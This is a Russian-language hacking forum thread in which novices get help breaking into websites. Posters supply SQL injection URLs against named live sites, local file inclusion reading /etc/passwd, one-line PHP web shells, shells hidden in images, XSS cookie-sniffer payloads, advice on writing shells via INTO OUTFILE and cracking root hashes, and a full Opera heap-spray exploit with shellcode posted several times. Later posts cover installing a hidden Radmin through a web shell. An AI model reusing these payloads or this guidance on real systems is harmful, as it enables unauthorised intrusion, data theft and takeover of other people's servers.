Файлы читать можешь? Можешь. Ищи админку, пытайся зайти, лей шелл. Ищи конфиги, читай, думай

Доброго дня всем.
Подскажите пожалуйста:

Можно ли имея доступ к MySQL базе данных c правами INSERT каким либо образом (специально сконструированным запросом) поднять эти самые права, так, чтобы можно было базу данных слить?
Или это не выполнимая задача?

Заранее извиняюсь, если вопрос покажется глупым, просто разбираюсь в SQL-injection методом проб и ошибок (язык SQL знаю плохо:( )

Для того что бы слить базу нужны права SELECT. Insert это уже для правки базы данных..

Доброго дня всем.
Подскажите пожалуйста:

Можно ли имея доступ к MySQL базе данных c правами INSERT каким либо образом (специально сконструированным запросом) поднять эти самые права, так, чтобы можно было базу данных слить?
Или это не выполнимая задача?

Заранее извиняюсь, если вопрос покажется глупым, просто разбираюсь в SQL-injection методом проб и ошибок (язык SQL знаю плохо:( )
гранты с INSERT без SELECT - это изврашения и наврятли там нет SELECT грантов ибо в конструкции INSERT допустим SELECT(депенд оф версион оф корс), а насчет дампа - тут либо с помошью скрипта(программы при удаленном конекте) локально/удаленно(если разрешенно в конфиге для данного Юзера и порт ничем не прикрыт) либо если еще есть в добавок file_priv дампить в файловую систему и сливать.

insert into mysql.user values(...)

insert into mysql.user values(...)
Это типо можно создать ещё одного юзера или у меня глюки o_O
Щя посмотрю, если это так то приведу пример
ps
Нашёл тока

CREATE USER 'antichat'@'%' IDENTIFIED BY '****';

GRANT ALL PRIVILEGES ON * . * TO 'antichat'@'%' IDENTIFIED BY '****' WITH GRANT OPTION MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0 ;

ps2
**** = 0000

Это типо можно создать ещё одного юзера или у меня глюки o_O
Щя посмотрю, если это так то приведу пример
Угу, если прав хватит работать с mysql(если уже SELECT нету то я сомневаюмь что к mysql есть доступ).

да да, можно юзера создать типа, а вообще проще так
http://www.mysql.ru/docs/man/Adding_users.html

Такой вопрос оч волнует - есть ограничение на ввод символов > 16 в XSS конструкции '><script>alert()</script>

Есть ли какой-то способ втиснуться? может сервисом сокращения воспользоваться?
Но тогда каким? И что сокращать: http://sniffer.gif?+document.cookie

это? помогите пожалуста... мозги спарились уже

Запрос метода GET или POST?
Вааще если GET то врядтле ограничят.
А если через POST то в инпуте есть ограничение.
Убери его через исходник, но это если сам php скрипт непроверяет входящие данные.

Запрос метода GET или POST?
Вааще если GET то врядтле ограничят.
А если через POST то в инпуте есть ограничение.
Убери его через исходник, но это если сам php скрипт непроверяет входящие данные.
>>Вааще если GET то врядтле ограничят.
бред

<?php
if($_GET['hehe'] and strlen($_GET['hehe'])<16)
{
echo 'ok';
}else{
exit;
}
?>

>>А если через POST то в инпуте есть ограничение.
<input type=text name="rate" size=12 maxlength=8>
ГЕТ или ПОСТ все равно будет ограничение

>>Убери его через исходник, но это если сам php скрипт непроверяет входящие данные.
сам понял что написал?

http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd%00
http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00

Возможно ли сдесь найти логи? (по стандартным путям не нашёл)

Такой вопрос оч волнует - есть ограничение на ввод символов > 16 в XSS конструкции '><script>alert()</script>

Есть ли какой-то способ втиснуться? может сервисом сокращения воспользоваться?
Но тогда каким? И что сокращать: http://sniffer.gif?+document.cookie

это? помогите пожалуста... мозги спарились уже
<SCRIPT language=javascript>
location="твой снифер";
</SCRIPT>

http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd%00
http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00

Возможно ли сдесь найти логи? (по стандартным путям не нашёл)

На счет путей не знаю, но можно найти полный путь до сайта. В файле httpd.conf ищеть DocumentRoot... Вот он "/var/www/html"... Попробуй пути еще раз из тех, что ettee давал. Вот - http://forum.antichat.ru/thread49775.html

farpost, nub-hacker, 1. Ищите логи и пробуйте залить шелл через них. 2. Пробуйте через сессии.

Где можно про сессии почитать на ачате. зы кроме логов шелл больше не льётся?
Ну неужели так трудно зайти в поиск?
http://forum.antichat.ru/thread49775.html

DocumentRoot... Вот он "/var/www/html"...

Внизу есть вот это


<VirtualHost *:80>
ServerName localhost
DocumentRoot "/var/www/html"
<Location /server-status>
SetHandler server-status
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Location>

По-моему это значит что папка доступна только для 127.0.0.1. Или нет?? По крайней мере скрипты по этому пути не читаются

Hi all greets to ur amazing job here

sorry fo my english

but i need help with this

now i got into site with sql inj and mysql.user table

1-got root and pass

what is the way to decrypt it?

2- i got access to load_file works but i cant find my way on the server

by load_file() doesnt got me any error

load_file(etc/passwd) works good

is there is any way to deal with this ????????


thanx to u all

Hello,
Hi all greets to ur amazing job here

sorry fo my english

but i need help with this

now i got into site with sql inj and mysql.user table

1-got root and pass

what is the way to decrypt it?
To decrypt(right is not "decrypt", but bruteforce ) mysql root password you can use a PasswordsPro utility from www.insidepro.com
but under some circumbstances you won't need a mysql root password.
If you get a pass, than you can look for phpmyadmin, or try to connect to mysql using mysql utility.

2- i got access to load_file works but i cant find my way on the server

by load_file() doesnt got me any error

load_file(etc/passwd) works good

is there is any way to deal with this ????????

FIrst of all, if magic_quotes_gpc option is off, you can try a "select into outfile" query, to upload a shell. to do this you should know a absolute local path. to find out the paths try to read default configs and logs with load_file() function.
if magic_quotes_gpc option is on, try to get as much information as possible, probably that would help you(e.g. config files with ftp or other passwords).

Сплоет заточен под Оперу. 9.63.
http://milw0rm.com/exploits/7135

Пытаюсь запустить через виртуалку.
Система Windows XP. Service Pack 3.
Браузер Opera 9.24

Эксплоит должен вызывать калькулятор после перезаполнение буфера.
Но никак не могу разобратся с вызовом удаленного кода(калькулятор).

Он должен запускаться со стороны клиента, или со стороны сервера?
var evil = "file://"; - пуста по умолчанию.
Пытался выполнить как
var evil = "http://test.test./cals.exe";
и
var evil = "file://cals.exe"; - да толку ноль. :(

Hello,
To decrypt(right is not "decrypt", but bruteforce ) mysql root password you can use a PasswordsPro utility from www.insidepro.com
but under some circumbstances you won't need a mysql root password.
If you get a pass, than you can look for phpmyadmin, or try to connect to mysql using mysql utility.






FIrst of all, if magic_quotes_gpc option is off, you can try a "select into outfile" query, to upload a shell. to do this you should know a absolute local path. to find out the paths try to read default configs and logs with load_file() function.
if magic_quotes_gpc option is on, try to get as much information as possible, probably that would help you(e.g. config files with ftp or other passwords).



thanks for help body really appreciated

Ershik, во первых не cals.exe, а calc.exe
и во вторых - может там полный путь надо или еще чо..

Относительно слива БД MySQL с правами INSERT:
PaCo
я уже отправил тебе сообщение в личку.
Всем остальным тоже спасибо за ответы, но прав Root у меня естественно нет! :(
Поэтому если кто нибудь знает методы повышения привилегий пользователя (хотябы до SELECT) буду рад услышать!

<SCRIPT language=javascript>
location="твой снифер";
</SCRIPT>
Процитирую тебя же 'Сам то понял что написал?', во первых нах ему переадресация без плушек и тд и судя по 'твой снифер' ты собераешься лить это снифер а не на фейк ? Во вторых - 16 символ обозначает 16 символов а не 66.

Кто нибуть может дать пример кода при котором можно выполнять команды с удаленного компьютера?(php сам знаю чуток но не представляю как это должно выглядеть)(интересно просто пощупать это так как с помощью этого взломали 2ip кто помнит(через whois проходила команда любая))

<?php eval($_REQUEST[ev]); ?>
<?php system($_REQUEST[ev]); ?>
Щупай :)

diznt, смотри сорцы любого шелла.

<?php eval($_REQUEST[ev]); ?>
<?php system($_REQUEST[ev]); ?>
Щупай :)
а ну так это то понятно! :)
Но каким методом был взломан через whois(2ip.ru)? Или можно как то whois проверить через командную строку?

diznt, ну хз, как там был взломан, он, но если там можно выпонлять любые команты, то могли залить шелл, как угодно. "copy", "wget", etc...

Ладно...
Такой вопрос... Как залить шелл через картинку?
Пробывал для теста в коментах картинки оставить код <html><script>alert('xss!')</script></html>
Но при переходе на картинку нету xss(
(через ie 6 заходил)

Создал картинку в пэйнте 1 на 1, открыл её блокнотом и в конец с новой строки дописывай php код.
<?php system($_GET['a']); ?> или лучше include($file). Ну и путь до картинки надо бэ знать. Или прямой или через инклуд.

Создал картинку в пэйнте 1 на 1, открыл её блокнотом и в конец с новой строки дописывай php код.
<?php system($_GET['a']); ?> или лучше include($file). Ну и путь до картинки надо бэ знать. Или прямой или через инклуд.
через инклуд нужно ее подгружать

Процитирую тебя же 'Сам то понял что написал?', во первых нах ему переадресация без плушек и тд и судя по 'твой снифер' ты собераешься лить это снифер а не на фейк ? Во вторых - 16 символ обозначает 16 символов а не 66.
я понял что написал,поздравляю что пощитал символы,глянул на глаз посколько в "<script>img=new Image(); img.src="http://сsite/snif/picture.gif"+document.cookie;</script>" будет на много больше символов,"твой снифер" я написал условно, да там куки не будет,но за то он смог бы перенаправлять юзеров на любые ресурсы в том числе и фэйки.

Ershik, во первых не cals.exe, а calc.exe
и во вторых - может там полный путь надо или еще чо..
Ок.
Значение
var evil = "calc.exe"; -он воспринимает странно.
В адресной строке, после перезаполнения появляется следующее:
test.test.ru/calc.exeXXXXXXXXXXXXXXXXXXXXXXX
Сам эксплоит:
<html>
<head><title>uh?</title></head>
<body>
<script>
// k`sOSe 11/15/2008
// tested on Windows XP SP3, opera 9.62 international version
// vulnerability found by send9
// there are many ways to achieve code execution, tons of function pointers to overwrite.
// maybe there's one more reliable...
var i=0;
// push es, pop es
var block = unescape("%u0607%u0607");
// metasploit WinExec c:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u 184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84 ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575 %u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u 018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b 30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850 %u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u 4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u61 63%u636c%u652e%u6578%u4100");
while (block.length < 81920) block += block;
var memory = new Array();
for (;i<1000;i++) memory[i] += (block + shellcode);
var evil = "calc.exe";
for(var i = 0; i<86438; i++)
evil += "X";
evil += "R.";
window.location.replace(evil);
</script>
</body>
</html>

Ок.
Значение
var evil = "calc.exe"; -он воспринимает странно.
В адресной строке, после перезаполнения появляется следующее:
test.test.ru/calc.exeXXXXXXXXXXXXXXXXXXXXXXX
Сам эксплоит:
<html>
<head><title>uh?</title></head>
<body>
<script>
// k`sOSe 11/15/2008
// tested on Windows XP SP3, opera 9.62 international version
// vulnerability found by send9
// there are many ways to achieve code execution, tons of function pointers to overwrite.
// maybe there's one more reliable...
var i=0;
// push es, pop es
var block = unescape("%u0607%u0607");
// metasploit WinExec c:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u 184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84 ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575 %u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u 018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b 30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850 %u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u 4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u61 63%u636c%u652e%u6578%u4100");
while (block.length < 81920) block += block;
var memory = new Array();
for (;i<1000;i++) memory[i] += (block + shellcode);
var evil = "calc.exe";
for(var i = 0; i<86438; i++)
evil += "X";
evil += "R.";
window.location.replace(evil);
</script>
</body>
</html>
насколько я понимаю в этих сплоитах(я понимаю не очень много)
evil используется только для того чтобы вылезти из памяти приложения, то есть вызвать переполнение/overflow.
сама же начинка лежит в переменной shellcode где и происходит вызов calc.exe

upd по коду обрати внимание на комментарии
особенно тут
// push es, pop es
var block = unescape("%u0607%u0607");
// metasploit WinExec c:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u 184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84 ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575 %u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u 018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b 30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850 %u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u 4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u61 63%u636c%u652e%u6578%u4100");

Создал картинку в пэйнте 1 на 1, открыл её блокнотом и в конец с новой строки дописывай php код.
<?php system($_GET['a']); ?> или лучше include($file). Ну и путь до картинки надо бэ знать. Или прямой или через инклуд.
Сам тестил? У меня не пашет (.gif)

Сам тестил? У меня не пашет (.gif)
Не пашет понятие растяжимое, если выпадает в error то значит в картинки какие то символы интерпретируется за начало php кода а если не пашет - не выполняеться код то значит не правильно что то делаешь с php кодом.

З.Ы. ша дочитал что ты хочешь - что бы картинка выполнялась как php код ее нужно либо проинклюдить в этот самый php код либо добавить расширения картинки в addtype - что бы она исполнялась как php код - сама по себе она не исполниться и конечно в браузере ты не увидешь алерта - браузер будет интерпретировать то что передает сервер по соответствующему заголовку HTTP.

Не пашет понятие растяжимое, если выпадает в error то значит в картинки какие то символы интерпретируется за начало php кода а если не пашет - не выполняеться код то значит не правильно что то делаешь с php кодом.

З.Ы. ша дочитал что ты хочешь - что бы картинка выполнялась как php код ее нужно либо проинклюдить в этот самый php код либо добавить расширения картинки в addtype - что бы она исполнялась как php код - сама по себе она не исполниться и конечно в браузере ты не увидешь алерта - браузер будет интерпретировать то что передает сервер по соответствующему заголовку HTTP.
Собственно видел в видео что как то в картинку подставляли алерт... заходили по картинке (заливали ее в ручную на локалхост) и вылетал алерт

не выполняеться код то значит не правильно что то делаешь с php кодом.

да? делал как Ch3ck и все равно. И в инете все облазил и испробывал. Не хочет

Собственно видел в видео что как то в картинку подставляли алерт... заходили по картинке (заливали ее в ручную на локалхост) и вылетал алерт

не выполняеться код то значит не правильно что то делаешь с php кодом.

да? делал как Ch3ck и все равно. И в инете все облазил и испробывал. Не хочет
Тебе уже 2 человека говорят - ЧТО НУЖНО ПРОИНКЛЮДИТЬ КАРТИНКУ В PHP КОД(который в итоге в баузере будет выводиться как текст с Content-type:text/html) или с недостаточной фильтрацией в Exif запихнуть туда код и тогда тебе и алерт будет и phpinfo(при условии что это инклюд без всяких фильтров) и в видео именно так и происходит.

Тебе уже 2 человека говорят - ЧТО НУЖНО ПРОИНКЛЮДИТЬ КАРТИНКУ В PHP КОД(который в итоге в баузере будет выводиться как текст с Content-type:text/html) или с недостаточной фильтрацией в Exif запихнуть туда код и тогда тебе и алерт будет и phpinfo(при условии что это инклюд без всяких фильтров) и в видео именно так и происходит.
так я инклудил
(то есть в конце ставил <?php include("2.gif"); ?> 2.gif норм картинка в том же каталоге) но в итоге ничего не изменялось (вроде как)

Извините за глупый вопрос. Сколько символов минимальная длинна пароля в phpBB 2.0.17. Просто есть хэш админа и надо поставить на брут на ночь. Вот чтобы не брутить лишние надо узнать мин.длинну.

Странно... В конце картинки пишешь <?php include('http://site.com/shell.php'); ?> и запускаешь картинку http://site.com/index.php?path=../../../../../image.gif всё. Откроется шелл, если конечно allow_url_include=on.

Странно... В конце картинки пишешь <?php include('http://site.com/shell.php'); ?> и запускаешь картинку http://site.com/index.php?path=../../../../../image.gif всё. Откроется шелл, если конечно allow_url_include=on.
а) понял про что ты...
Не... Я имею ввиду чисто шелл через картинку залить при этом нету lfi/rfi !

Если нет лфи/рфи то как написал Пако, надо добавлять add type чтобы гифка исполнялась как пхп

Если нет лфи/рфи то как написал Пако, надо добавлять add type чтобы гифка исполнялась как пхп
.htaccess ? Если через него то у меня же нету доступа к серву

diznt
Вот это твоя аватарка?
https://forum.antichat.ru/avatars/avatar49286.gif
Ты её сам залил?

Ты как думаешь, если-бы можно было .gif файлы просто так исполнять, то долго бы этот форум прожил?

Надо иногда наверное и самому подумать, тем более:
php сам знаю чуток

2 diznt то, что ты видел - это возможна XSS бага старого IE
когда в конец png файла можно былобы приписать html/javascript и он выполнилсябы при просмотре данной картинке. Но этот баг вроде существовал еще во времена IE 5. если не раньше.

ну во-первых не gif, а png
Встаялешь в конец картинки <script>alert(/olololo/)</script>, заливаешь на сайт и смотришь картинку. Работает только в IE

Ничего актуального тут нет - только при LFI или RFI возможно исполнить код, зашитый в картинку, без вариантов. Или загрузить .htaccess, в котором будет прописано, что .jpg или .gif или еще какое расширение будет выполняться как php-скрипт. Всё.

А баги, работавшие в IE5-6 уж точно неактуальны:)

ну во-первых не gif, а png
Встаялешь в конец картинки <script>alert(/olololo/)</script>, заливаешь на сайт и смотришь картинку. Работает только в IE
такое редко юзают, енто раз.

Во вторых я не думаю что на античате такое бы было %)

Да как слеш написал это бага старого эксплорера, правда работало не толкьо в 5.5 но и в 6-ой версии

Подскажите новичку, пожалуйста.
На одном вап-сайте вставил в форум картинку-сниффер. В логах получаю такие данные: http:/ /sait.ru/member.php?sid=7cda1b46636bc1a8d88898246a615fa6&a=forum&f=4&t=1075&
Переходил по такой ссылке в течение 1й минуты после получения, но почему-то выкидывает на главную страницу.
Можно ли вобще как-то использовать данную информацию?

www.reznik.pri.ee/document.ph_p?id=138
Как узнать скока сталбцоф ? Пробавал черес order by . А union select никак .. Потскожыте
Или приведите пример

http://www.reznik.pri.ee/document.php?id=209+AND+SUBSTRING((version()),1,1) =5--

version: 5.1.34-log
database: np2482_reznik
user: np2482_reznik@localhost
os: pc-linux-gnu

Ckорее всего никак, т.к. JOIN

видю только слепую скулю:


http://www.reznik.pri.ee/document.php?id=138+and+substring(version(),1,1)=5


А вообще думать надо, кого ломаешь, там же афганцы

Я ломат несобераюс .. Проста некак немогу подобрат столпцы ... поетаму и спрашевал . А версия мне ненужна . Всё спс

Saiga тебе говорят что там слепая, а ты заладил столбцы да столбцы

www.reznik.pri.ee/document.ph_p?id=138
Как узнать скока сталбцоф ? Пробавал черес order by . А union select никак .. Потскожыте
Или приведите пример


эту скулю можно раскрутить толькоподбором, тоесть допустим делаем примерно такой запрс
www.reznik.pri.ee/document.php?id=138 and exists (select table_name from (select table_name from information_schema.tables where table_schema = database() limit [PARAM],1) a where ascii(substr(table_name,[SymbolNumber],1))>[GM])

все что в квадратных скобках - это переменные значения
[GM]- код символа
[Param] - думаю сам догадаешься...
[SymbolNumber] - это номер символа в текущем [Param]

примерно так, если вручную то муторно и долго...
Советую написать скрипт для перебора

забыл написать, если условие выполнится то страница загрузится без ошибок, если нет, то соответственно будет пустой...

peonix

Если это всё за правду то огромное спс тебе ))

Будет время буду пробавать

Извините за глупый вопрос. Сколько символов минимальная длинна пароля в phpBB 2.0.17. Просто есть хэш админа и надо поставить на брут на ночь. Вот чтобы не брутить лишние надо узнать мин.длинну.

// Без ответа

Всем еще раз доброго дня.

У меня вопрос к специалистам по SQL-inj:

Тестировал один сайт на уязвимости с помощью Acunetix и он показал что определенное место предположительно уязвимо под sql инъекцию.
Но проблема в том, что меняется параметр client-ip из http header в него подставляется ' и сервер выдает
Query:
Error: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1247058998'' at line 1
(это все отображается при запуске указаннрй уязвимости через HTTP Editor, как я понял он изменяет данные служебного заголовка)
Если забивать в строку URL путь до якобы уязвимого php файлика, идет автоматическая переадресация.
Так вот, если кто знает как такую штуку возможно раскрутить, если вообще возможо,
в частности, можно ли этот client-ip передать через url браузера (как при обычных sql-inj)?
Буду крайне признателен за совет!

2nub-hacker, ты прежде чем написать хотя бы попробовал что-нибудь предпринять. Ты мог бы уже раз 150 установить Denwer, поставить нужную phpbb и проверить допустимое количество символов при реге, убедившись, что там минимальное значение один символ.

насколько я понимаю в этих сплоитах(я понимаю не очень много)
evil используется только для того чтобы вылезти из памяти приложения, то есть вызвать переполнение/overflow.
сама же начинка лежит в переменной shellcode где и происходит вызов calc.exe

upd по коду обрати внимание на комментарии
особенно тут
// push es, pop es
var block = unescape("%u0607%u0607");
// metasploit WinExec c:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u 184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84 ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575 %u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u 018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b 30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850 %u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u 4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u61 63%u636c%u652e%u6578%u4100");


Даже если я оставляю сплоит "как есть" - он не вызывает калькулятор. Он подгружает систему и останавливается.
Все дело, в "unescape".
Попробовал сам расшифровывать - либо вбито от балды, либо защита стоит двойная.

Всем еще раз доброго дня.

У меня вопрос к специалистам по SQL-inj:

Тестировал один сайт на уязвимости с помощью Acunetix и он показал что определенное место предположительно уязвимо под sql инъекцию. Но проблема в том, что меняется параметр client-ip из http header.
Если забивать в строку URL путь до якобы уязвимого php файлика, идет автоматическая переадресация, и сайт показывает Error! Please try again later.
Так вот, если кто знает как такую штуку возможно раскрутить, если вообще возможо, буду крайне признателен за совет!

Юзай SIPT

Юзай SIPT
Правильно, сначала сканер, потом СИПТ. Прямой путь к деградации.

genadiez Мой тебе совет -
Пока не научишься понимать как это работает, вообще не пользуйся никакими программами и скриптами.
Конкретно по твоему случаю:
Сканер может ошибаться.
Надо смотреть линк.

Даже если я оставляю сплоит "как есть" - он не вызывает калькулятор. Он подгружает систему и останавливается.
Все дело, в "unescape".
Попробовал сам расшифровывать - либо вбито от балды, либо защита стоит двойная.
Дорогой друг! (=
1. уверены ли Вы что у Вас уязвимая версия оперы, а именно 9.62?
2. Насколько хорошо Вы понимаете принципы работы программ( ну там адресация памяти, машинные инструкции)? Почему вы так уверены, что там просто строка "calc.exe" вбита? ))
3. это конечно PoC, но возможно и в нем есть защита от киддисов.

к сожалению это всё мои домыслы, ибо проверить не могу нет ни подходящей оперы, ни винды.
upd
вот в эту тему советую заглянуть https://forum.antichat.ru/threadnav128650-1-10.html

как найти XSS подскажите народ

Jokster, +1 , но он не знал как подменить заголовок, я ему подсказал. А так верно, нада понимать почему сканер орет и как это РУКАМИ заюзать.

Jokster, +1 , но он не знал как подменить заголовок, я ему подсказал. А так верно, нада понимать почему сканер орет и как это РУКАМИ заюзать.

Спасибо за ответ, однако
SIPT не видит там уязвимого места

А воспользовавшись HTTP Editor посылаю на сервак запрос

GET /xxx/feedback/mail.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: somehost.com
Connection: Close
client-ip: '
Pragma: no-cache

получаю в ответ

A fatal MySQL error occured
Query:
Error: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND time > '1247218524'' at line 1

В случае подстановки вместо ' в client-ip любого другого значения идет переадресация на error.shtml
(также и в случае запроса через URL http://somehost.com/xxx/feedback/mail.php)

Скажите мне пожалуйста, через данный header можно скуль реализовать?

Скажите мне пожалуйста, через данный header можно скуль реализовать?

если заголовок client-ip действительно содержит скулю, то почему бы и нет... потесть на вывод ошибок запросами по типу "' or 1=1" и "'or 1=2", если разница в ответах будет, значь вероятность раскрутить скулю есть.

Есть ли рабочие сплойты под 2.6.18 кроме этого? (http://milw0rm.fsb-my.name/index.php?do=exploit&exploit=6984)
Спасибо

2Fata1ex
http://www.hackzone.ru/exploit/view/id/2872/
http://www.hackzone.ru/exploit/view/id/5296/
http://www.hackzone.ru/exploit/view/id/5563/
http://www.hackzone.ru/exploit/view/id/5686/

Есть ли рабочие сплойты под 2.6.18 кроме этого? (http://milw0rm.fsb-my.name/index.php?do=exploit&exploit=6984)
Спасибо
http://forum.xakep.ru/m_1073063/tm.htm
Х,з. может не оно

Вопрос: Можно ли запускать .sh скрипты с веб шелла ?

Вопрос: Можно ли запускать .sh скрипты с веб шелла ?
cron

Вопрос: Можно ли запускать .sh скрипты с веб шелла ?


bash /path/to/script.sh

bash далеко не везде присутсвует по умолчанию, наприме в BSD системах его нет, можно поставить отдельно, но этого обычно не делают.
доступные шеллы (не все, а только прописанные) можно посмотреть в /etc/shells
и как описано выше, запускать.

по крону тоже можно, но это более извращенский вариант. не для того он используется изначально :) но если вдруг другого способа нет, можно попробовать :)

оО Пасиппи,работает.Про /etc/shells я знал,но всё равно спасибо.А почему команда bash не реагирует на ошибки ?

for DIR in /etc /bin /shit

do

ls -ld $DIR

done

Чет такой скрыпт не работает(

Зато если вписать echo 5,то будет работать )

Что дают suid и sgid файлы?
прочитал статью на инаттаке.
http://www.inattack.ru/article/216.html
Относительно понял. А есть ли статья, как можно использовать в своих целях биты?

Hi

pls i need help with this site if u may ??

i had access to admin panel in site but only allowed HTML script modified

is there is any way to upload shell by HTML or code it to rfi or lfi

than for help body


and sorry again for my English

No, you can't.

вобщем трабла...
есть два путя)
например
http://exaple.com/gg/
и
http://exaple.com/forum/
Вобщем нашел пассивную xss в каталоге gg. Выводит алерт с куками только в сафари и в ослике. в опере выводит пустой алерт... встречаюсь с этой шнягой первый раз. в чем проблема?

в чем проблема?

А сам как думаеш? В браузере! :)

можно ли какнить заставить работать в опере?

Подскажите плиз. во скуля http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,version(),2,3,4,5-- так вот, там на сайте есть форум phpbb. я запустил скрипт kiborg'a на определение версии, он показал 3.0.4 Подскажите плиз, какие там таблицы с именами и пассами юзеров и колонки. Читал elekтовский пост,насчёт табиц phpbb_
phpbb2_, но с ними не катит. http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,version(),3,4,5+from+phpbb_--

Подскажите плиз. во скуля http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,version(),2,3,4,5-- так вот, там на сайте есть форум phpbb. я запустил скрипт kiborg'a на определение версии, он показал 3.0.4 Подскажите плиз, какие там таблицы с именами и пассами юзеров и колонки. Читал elekтовский пост,насчёт табиц phpbb_
phpbb2_, но с ними не катит. http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,version(),3,4,5+from+phpbb_--
table users: phpbb3_users
Колонки сам вырвешь/найдешь

table users: phpbb3_users
Колонки сам вырвешь/найдешь
http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,2,3,4,5+from+phpbb3_users--

не катит (( Знающие помогите плиз.

там 5-я версиа БД тебе лень Сипт зАпустить и узнать какая там табелка и какие там таблички или тебе нравится надоедать вопросами на которые уже 100000 раз отвечали и простой поиск по форуму тебе даст на все ответ...

Database Version: 5.0.45
Database name: ege_site
User name: site_view@localhost

там 5-я версиа БД тебе лень Сипт зАпустить и узнать какая там табелка и какие там таблички или тебе нравится надоедать вопросами на которые уже 100000 раз отвечали и простой поиск по форуму тебе даст на все ответ...

Database Version: 5.0.45
Database name: ege_site
User name: site_view@localhost

Не знаю что под словом "сипт" ты имеешь ввиду. Но information schema tables там не работает.
add//Sory работает

2. Я искал на форуме, но кроме парочки дефолтных таблиц и куча битых атачей ничего не нашол.

SIPT Это прога для работа с SQL инекциями.
а почему не работает information_schema?
а это что?
http://egechita.ru/news/show_news.php?id_news=-1+union+select+1,table_name,3,4,5+from+information _schema.tables+limit+18,1

перебирайте лимитом и ищите нужную вам базу, потом нужную вам колонку.
и читайте документацию больше, тут её очень и очень много

Что дают suid и sgid файлы?
прочитал статью на инаттаке.
http://www.inattack.ru/article/216.html
Относительно понял. А есть ли статья, как можно использовать в своих целях биты?

Бывает опытные админы составляют такие скрипти, например видел на одном хостинге, которые создавали пользователя и т.д, не помню на чем, .sh или пхп или перл, ето так для примера, суть не в етом. Ищешь, если достуны на запись, вставляешь свой код, а дальше по обдстановке что тебе нужно, например: чмоднуть или стянуть шедов:(

имеется веб шелл на (windows server 2003/safe mode-off) имею права на чтение/запись но нет доступа к консоли (нет прав на исполнение) моя цель поднять radmin (hide сборка)

По моему в с99shell да и в других шеллах права на консоль системные? То есть через шелл права полные?

имею права на папки (drwxrwxrwx) могу свободно перемещатся по дискам коих там 2 но консоль не воспринимает команды юзал (с99 и wso2 от Orb) никак не получается выполнить залитый radmin

По моему в с99shell да и в других шеллах права на консоль системные?
по твоему правильно но тут по факту не так...
ps уже заливал и поднимал radmin на виндах через шелл все было гладко а щас гдето камень...

RDP сначало поставь. А потом уже радмин открывай. Через system() в реестре открываешь порт. Потом коннектишься через mstsc - инсталишь радмин.

StarFire, а вот возьми другой шелл,к примеру р57, и посмотри - есть ли сейф-мод, а лучше - посмотри пхпинфо.

Здравствуйте господа! Хочу спросить у вас у хацкеров прожженных :) на днях просканил один сервак пауком версия 6.50 он мне выдал такую багу: порт 3389/tcp сервис RDP - Terminal Service Client состояние: <работает>
найдена уязвимость DoS-атака (компьютер сейчас находится в стадии перезагрузки)

Как мне локально реализовать ещё раз такую DoS-атака, может софт, какой есть, может самому как-то можно запрос сконфигурировать.
Как ваще эта атка реализуется простой Dos на указанный порт или как. Зарания всем благодарин.
p.s просьба не пинать ламера ушастого :cool:

Подскажите плиз. есть форум 2.0.15 phpbb. запустил эксплоит вот этот
